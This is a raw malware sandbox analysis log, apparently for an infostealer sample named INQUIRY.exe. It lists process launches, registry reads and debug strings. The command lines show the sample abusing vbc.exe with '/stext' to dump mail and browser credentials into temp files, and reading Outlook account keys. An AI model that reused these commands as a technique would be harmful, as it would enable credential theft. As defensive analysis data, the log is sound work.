                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
